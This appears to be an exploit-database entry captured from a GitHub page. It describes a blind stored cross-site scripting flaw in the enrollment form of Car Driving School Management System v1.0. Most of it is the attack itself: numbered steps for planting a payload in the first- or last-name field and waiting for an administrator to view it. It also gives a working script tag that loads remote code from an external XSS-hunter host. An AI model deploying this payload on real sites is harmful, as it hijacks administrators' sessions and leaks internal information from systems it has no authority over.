Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
# Exploit Title: Car Driving School management System v1.0 - Blind Cross Site Scripting(XSS)
# Exploit Author: NS Kumar (n1_x)
# Date: January 31, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15070/car-driving-school-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cdsms_1.zip
# Tested on: Parrot Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0
# Exploit Description:
# Car Driving School management System v1.0 suffers from Blind XSS Injection Vulnerability allowing remote attackers to gain admin access and view internal IPs.
````````````````````````````````````````To Exploit````````````````````````````````````````````````````
Step 1: Goto Enrollment Page
Step 2: Put XSS Hunter Payload on Either First Name or Last Name field
Step 3: Wait for Admin to view your details
Step 4: Then you will see xss fires alert on xss hunter page
Payload Used for this Exploit: "><script src=https://d4.xss.ht></script>
```````````````````````````````````````````````````````````````````````````````````````````````````````